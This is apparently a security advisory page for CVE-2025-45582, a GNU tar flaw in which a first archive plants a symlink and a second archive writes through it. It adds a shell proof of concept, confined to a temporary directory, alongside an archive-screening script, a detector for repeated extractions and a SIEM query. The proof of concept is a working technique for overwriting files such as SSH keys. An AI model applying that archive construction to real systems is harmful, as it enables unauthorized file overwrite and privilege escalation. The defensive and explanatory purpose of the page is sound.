CVE-2025-45582
📋 TL;DR
GNU Tar through version 1.35 contains a directory traversal weakness that allows files to be overwritten via a two-step process using crafted TAR archives. The attacker first gets the victim to extract an archive containing a symlink to a critical directory, then a second archive whose member paths pass through that symlink. The symlink persists on disk between the two extractions, and the second tar invocation follows it like any other directory because it has no record of having created it. This primarily affects server applications that automatically extract user-supplied archives into a shared directory and software installation processes that run 'tar xf' multiple times in the same directory.
💻 Affected Systems
- GNU Tar, all releases through 1.35
📦 What is this software?
GNU Tar is the GNU project's implementation of the tar archiver, the `tar` command on most Linux distributions, used to create, list and extract .tar archives (plain or compressed).
⚠️ Risk & Real-World Impact
Worst Case
Critical files could be overwritten with the privileges of the process running tar, leading to privilege escalation, data destruction, or backdoor installation (e.g., overwriting SSH authorized_keys, system binaries, or configuration files when an installer or service extracts as root).
Likely Case
Unauthorized file modification in user-writable directories, potentially compromising user data or application integrity in multi-user systems.
If Mitigated
Limited to file overwrite in directories where the user already has write permissions, with no privilege escalation beyond existing access.
🎯 Exploit Status
Exploitation requires two attacker-controlled archives extracted in order into the same directory: the first plants the symlink, the second writes through it. One archive is not enough, because GNU tar delays creating symlinks whose target is absolute or contains '..' until the end of that extraction, so members later in the same archive cannot traverse them; nothing comparable protects a second, separate tar run. A public write-up with a proof of concept is among the references below.
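The two-step extraction described above, as an added example that is not code from the page or from the GNU tar project. It runs entirely inside a temporary directory: a stand-in `target/` directory plays the "critical directory", the two archives are built in a staging area, and the second half shows the first workaround listed further down (a fresh directory per extraction) defeating the same archives. It assumes GNU tar 1.35 or earlier is on PATH as `tar`; every file, directory and archive name in it is hypothetical.

```shell
#!/bin/sh
# Added example, not code from the page or from the GNU tar project. It rebuilds
# the two-step traversal from the TL;DR inside a throwaway directory and then
# shows that a fresh extraction directory per archive defeats it. Assumptions:
# "tar" on PATH is GNU tar 1.35 or earlier; "target/" stands in for the
# critical directory an attacker would aim at (a real attack would point the
# symlink at something like ~/.ssh); all file and archive names are hypothetical.

# make_archives BASE VICTIM: write BASE/first.tar (a symlink member "link" that
# points at VICTIM) and BASE/second.tar (a regular file member "link/evil.txt").
# second.tar deliberately carries no "link/" directory entry: for a directory
# member GNU tar replaces an existing symlink with a real directory (see
# --keep-directory-symlink), which would neutralise the attack.
make_archives() {
    base=$1
    victim=$2
    staging=$base/staging
    mkdir -p "$staging/link"
    echo "attacker content" > "$staging/link/evil.txt"
    ( cd "$staging" && tar -cf "$base/second.tar" link/evil.txt )
    rm -rf "$staging/link"
    ( cd "$staging" && ln -s "$victim" link && tar -cf "$base/first.tar" link )
}

# setup: create the victim directory holding the file the attacker wants to
# replace, plus the two archives. Prints the base directory.
setup() {
    base=$(mktemp -d)
    mkdir -p "$base/target"
    echo "original content" > "$base/target/evil.txt"
    make_archives "$base" "$base/target"
    echo "$base"
}

# report FILE: "overwritten" if FILE now holds the attacker's content, else "intact".
report() {
    if [ "$(cat "$1")" = "attacker content" ]; then echo overwritten; else echo intact; fi
}

# The vulnerable pattern: both archives unpacked with "tar xf" into one shared
# work directory, as a server that extracts every upload into the same place
# would. The first extraction leaves work/link -> target on disk; the second
# writes work/link/evil.txt, and tar follows the existing symlink.
demo_same_directory() {
    base=$(setup)
    mkdir -p "$base/work"
    tar -xf "$base/first.tar" -C "$base/work" 2>/dev/null || :
    tar -xf "$base/second.tar" -C "$base/work" 2>/dev/null || :   # a hardened tar may refuse here
    result=$(report "$base/target/evil.txt")
    rm -rf "$base"
    echo "$result"
}

# The mitigation: every archive gets its own fresh directory, so the symlink
# from the first archive is never on the path of the second extraction.
demo_fresh_directories() {
    base=$(setup)
    for name in first second; do
        work=$(mktemp -d "$base/work.XXXXXX")
        tar -xf "$base/$name.tar" -C "$work" 2>/dev/null || :
    done
    result=$(report "$base/target/evil.txt")
    rm -rf "$base"
    echo "$result"
}

echo "same directory:    $(demo_same_directory)"    # GNU tar 1.35: overwritten
echo "fresh directories: $(demo_fresh_directories)" # intact
```

Point the `ln -s` at a directory you can afford to lose if you adapt this; the script only ever touches its own mktemp tree. Note the order in `make_archives`: second.tar is built while `link` is a real directory, so tar records only the file member and no `link/` entry.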
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: Not yet released
Vendor Advisory: https://lists.gnu.org/archive/html/bug-tar/2025-08/msg00012.html
Restart Required: No
Instructions:
Monitor GNU Tar releases for patch. Currently no official fix available. Consider workarounds below.
🔧 Temporary Workarounds
Extract to unique directories
Always extract each archive into a fresh, empty directory, so that no symlink left behind by an earlier extraction lies on the path of a later one. mktemp -d creates the directory atomically and returns its name once; computing the name twice with date +%s can yield two different directories if the clock ticks over between the mkdir and the tar call, and the resulting name is predictable by other local users.
dir=$(mktemp -d) && tar xf archive.tar -C "$dir"
Use --one-top-level option
Tar's --one-top-level wraps the archive's contents in a named subdirectory. This only helps if that subdirectory is new for every extraction: reusing the same --one-top-level directory for two untrusted archives recreates exactly the two-step condition described above.
tar xf archive.tar --one-top-level=extracted_files
🧯 If You Can't Patch
- Implement strict input validation: before extracting, list each user-supplied TAR archive (tar -tvf) and reject it if any member is a symlink or hard link, has an absolute name, or contains a '..' path component.
- Run tar extraction processes with minimal privileges and in isolated environments (containers/chroots) to limit potential damage scope.
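As an added example (not code from the page or from the GNU tar project), a pre-extraction screen implementing the input-validation control above. It pairs a verbose listing, whose first character is the member type, with a plain listing, which keeps names with spaces intact, and rejects link members, absolute names and '..' components. Assumptions: `tar` is GNU tar or bsdtar (both print the type letter first in `-tvf` output), member names contain no newlines, and the archives built in `demo_screen` are constructed for this example. Depending on the tar version, listings may already show absolute and '../' names with the prefix removed, so the link-member check is the one this CVE actually depends on.

```shell
#!/bin/sh
# Added example, not code from the page or from the GNU tar project: a
# pre-extraction screen for the "reject archives containing symlinks or '..'"
# control above. Assumes "tar" is GNU tar or bsdtar (both print the member type
# as the first character of the -tvf mode string) and that member names contain
# no newlines. Archive and file names are hypothetical.

# screen_archive FILE -> exit 0 if no member is a symlink/hard link, has an
# absolute name or a ".." component; exit 1 (reasons on stderr) otherwise.
screen_archive() {
    archive=$1
    tmp=$(mktemp -d)
    # Two listings of the same archive, in the same member order: the verbose
    # one supplies the type letter ('l' symlink, 'h' hard link, 'd' directory,
    # '-' regular file), the plain one supplies each name intact, one per line.
    tar -tvf "$archive" 2>/dev/null | cut -c1 > "$tmp/types"
    tar -tf "$archive" 2>/dev/null > "$tmp/names"
    paste "$tmp/types" "$tmp/names" | awk -F'\t' -v archive="$archive" '
        $1 == "l" || $1 == "h"  { flag("link member " $2) }
        $2 ~ /^\//              { flag("absolute member name " $2) }
        $2 ~ /(^|\/)\.\.(\/|$)/ { flag("dot-dot component in " $2) }
        function flag(why) { print "reject " archive ": " why > "/dev/stderr"; bad = 1 }
        END { exit bad }
    '
    status=$?
    rm -rf "$tmp"
    return $status
}

# demo_screen: build a clean archive and one carrying a symlink (both
# constructed here), screen both, and print "clean=ok bad=rejected".
demo_screen() {
    d=$(mktemp -d)
    mkdir -p "$d/pkg"
    echo "hello" > "$d/pkg/readme.txt"
    ( cd "$d" && tar -cf clean.tar pkg )
    ln -s /etc "$d/pkg/link"           # the first-stage payload of the CVE
    ( cd "$d" && tar -cf bad.tar pkg )
    if screen_archive "$d/clean.tar" 2>/dev/null; then a=ok; else a=rejected; fi
    if screen_archive "$d/bad.tar" 2>/dev/null; then b=ok; else b=rejected; fi
    rm -rf "$d"
    echo "clean=$a bad=$b"
}

demo_screen
```

Wire `screen_archive` in front of every `tar xf` of user-supplied input: `screen_archive "$upload" && tar -xf "$upload" -C "$(mktemp -d)"`. Rejecting hard links as well as symlinks is deliberately conservative; nothing a legitimate upload needs is lost, and it removes the first stage of the two-step chain entirely.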
🔍 How to Verify
Check if Vulnerable:
Check the tar version with tar --version | head -n1. GNU tar 1.35 and earlier carry the behaviour; the exposure exists only where archives from untrusted sources are extracted more than once into the same directory. Distributions may backport a fix without changing the upstream version number, so check the distribution package changelog as well.
Check Version:
tar --version | head -n1
Verify Fix Applied:
The advisory names no fixed upstream release yet, so there is nothing definite to compare against. When one is named, compare the installed version against it as a version number rather than with a bare grep (grep -q '1.36' also matches 1.36 inside any longer string, and the unescaped dot matches any character). sort -V is GNU coreutils:
fixed=1.36; installed=$(tar --version | head -n1 | awk '{print $NF}')   # 1.36 is a placeholder until the advisory names a release
[ "$(printf '%s\n' "$fixed" "$installed" | sort -V | head -n1)" = "$fixed" ] && echo Patched || echo Vulnerable
📡 Detection & Monitoring
Log Indicators:
- Multiple tar extraction operations in same directory within short timeframes
- Tar operations with user-supplied archive names
- Failed file write attempts to protected directories
Network Indicators:
- Uploads of TAR archives to web applications or file transfer services
SIEM Query:
Splunk-style pseudo-query; adapt field names to your schema. Group by the extraction directory rather than by the full command line: the pattern is two different archives unpacked into the same directory, and a bare command_line="*xf*" match misses the -x -f and --extract forms.
process.name="tar" AND (command_line="* x*" OR command_line="*-x*" OR command_line="*--extract*")
| rex field=command_line "(?:-C\s*|--directory[= ])(?<dest>\S+)"
| eval dest=coalesce(dest, process.working_directory)
| bin _time span=5m
| stats count values(command_line) as cmds by host, dest, _time
| where count > 1
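The "multiple tar extraction operations in the same directory within a short timeframe" indicator above, as an added example implemented as a shell/awk filter over process-execution records so the logic can be checked offline before it is ported to a SIEM. It is not part of the page and is not tied to any product. The record layout epoch|host|cwd|command line and the sample records are constructed for this example. What it adds beyond the query above is the destination-directory resolution: -C/--directory is honoured, relative targets are resolved against the recorded cwd, and archive creation is ignored.

```shell
#!/bin/sh
# Added example, not from the page or any SIEM product: the "multiple tar
# extractions into the same directory within a short window" indicator,
# implemented over process-execution records. Assumptions: one record per line
# as epoch|host|cwd|command line (a constructed format, not a real log schema);
# the sample records below are constructed for this example.

SAMPLE_LOG='1730000000|web1|/srv/uploads|tar xf upload_1.tar
1730000030|web1|/srv/uploads|tar xf upload_2.tar
1730000100|web2|/home/bob|tar -xf a.tar -C /tmp/extract_1730000100
1730000150|web2|/home/bob|tar -xf b.tar -C /tmp/extract_1730000150
1730000200|web3|/opt|tar --extract --file=c.tar -C app
1730009000|web3|/opt|tar --extract --file=d.tar -C app
1730000300|web1|/srv/uploads|tar cf backup.tar data'

# detect_repeated_extractions WINDOW_SECONDS < records
# Emits one ALERT line for every tar extraction that lands in the same
# destination directory on the same host as a previous extraction no more than
# WINDOW_SECONDS earlier. Destination = the -C/--directory argument, resolved
# against cwd when relative, else cwd itself. Non-extract runs ("tar cf") are ignored.
detect_repeated_extractions() {
    awk -F'|' -v window="$1" '
        $4 ~ /(^|\/)tar / {
            n = split($4, a, " ")
            extract = 0; dest = $3
            for (i = 2; i <= n; i++) {
                t = a[i]
                # long form, dashed cluster (-xf, -xvf, -x), or old-style first cluster (xf)
                if (t == "--extract" || t == "--get") extract = 1
                else if (t ~ /^-[A-Za-z]+$/ && index(t, "x") > 0) extract = 1
                else if (i == 2 && t ~ /^[A-Za-z]+$/ && index(t, "x") > 0) extract = 1
                if (t == "-C" || t == "--directory") { dest = a[i + 1]; i++ }
                else if (t ~ /^--directory=/) dest = substr(t, 13)
            }
            if (!extract) next
            if (dest !~ /^\//) dest = $3 "/" dest
            key = $2 SUBSEP dest
            if (key in last) {
                delta = $1 - last[key]
                if (delta <= window)
                    print "ALERT host=" $2 " dir=" dest " repeat extraction " delta "s after previous: " $4
            }
            last[key] = $1
        }
    '
}

# With a 5-minute window only web1 fires: web2 used fresh directories and
# web3 reused a directory, but hours apart.
printf '%s\n' "$SAMPLE_LOG" | detect_repeated_extractions 300
```

The web3 case is the judgement call: the same directory reused hours apart is the same exposure, just less likely to be one attacker's two uploads. Widen the window (or drop it and alert on any reuse) for installers and build hosts, where the legitimate rate of extractions is low.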
🔗 References
- https://github.com/i900008/vulndb/blob/main/Gnu_tar_vuln.md
- https://lists.gnu.org/archive/html/bug-tar/2025-08/msg00012.html
- https://www.gnu.org/software/tar/
- https://www.gnu.org/software/tar/manual/html_node/Integrity.html
- https://www.gnu.org/software/tar/manual/html_node/Security-rules-of-thumb.html
- http://www.openwall.com/lists/oss-security/2025/11/01/6